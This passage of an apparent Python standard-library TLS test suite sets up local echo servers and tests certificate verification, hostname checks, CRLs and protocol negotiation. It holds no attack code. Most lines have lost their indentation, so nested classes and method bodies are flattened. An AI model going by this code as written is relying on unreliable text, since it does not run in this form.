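# its echo behaviour; in sketch form, the ConnectionHandler.run() loop below
# recognises:
#
#     b'over'               close the connection
#     b'STARTTLS'           reply b'OK\n', then wrap the socket in TLS
#     b'ENDTLS'             reply b'OK\n', then unwrap back to plaintext
#     b'CB tls-unique'      send repr() of the channel-binding data
#     b'PHA'                initiate TLS 1.3 post-handshake authentication
#     b'HASCERT'/b'GETCERT' report on the peer certificate
#     anything else         echo the data back lower-cased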
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
        def write(self, data):
            if self.sslconn:
                return self.sslconn.write(data)
            else:
                return self.sock.send(data)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except (ConnectionResetError, ConnectionAbortedError):
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except ssl.SSLError as err:
# On Windows sometimes test_pha_required_nocert receives the
# PEER_DID_NOT_RETURN_A_CERTIFICATE exception
# before the 'tlsv13 alert certificate required' exception.
# If the server is stopped when PEER_DID_NOT_RETURN_A_CERTIFICATE
# is received test_pha_required_nocert fails with ConnectionResetError
# because the underlying socket is closed
                    if err.reason == 'PEER_DID_NOT_RETURN_A_CERTIFICATE':
if self.server.chatty and support.verbose:
sys.stdout.write(err.args[1])
# test_pha_required_nocert is expecting this exception
raise ssl.SSLError('tlsv13 alert certificate required')
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
    class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
                except ssl.SSLError:
                    # SSLError is a subclass of OSError; re-raise so the
                    # OSError handler below doesn't swallow SSL failures.
                    raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
    def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
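# A typical call, as made by test_echo() further down (illustrative only):
#
#     client_context, server_context, hostname = testing_context()
#     stats = server_params_test(client_context, server_context,
#                                chatty=True, connectionchatty=True,
#                                sni_name=hostname)
#     # stats now carries e.g. 'cipher', 'version' and 'peercert' entries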
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
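# expect_success is effectively tri-state: False means the combination must
# fail, True means it must succeed with any protocol version, and a string
# means it must succeed and negotiate exactly that version, e.g. (from
# test_PROTOCOL_TLS below):
#
#     try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
#     try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')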
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
                # getpeercert() raises ValueError while the handshake isn't
                # done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
                cipher = s.cipher()[0].split('-')
                # Under TLS 1.2 this is an ECDHE-ECDSA cipher; TLS 1.3
                # cipher names don't encode the key exchange, so only check
                # that a cipher was negotiated at all.
                self.assertTrue(cipher)
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
                cipher = s.cipher()[0].split('-')
                # TLS 1.3 is disabled above, so an ECDHE-ECDSA cipher must
                # have been negotiated.
                self.assertEqual(cipher[:2], ['ECDHE', 'ECDSA'])
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
        # TLS 1.3 has a different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
            # TLS 1.3 performs the client cert exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
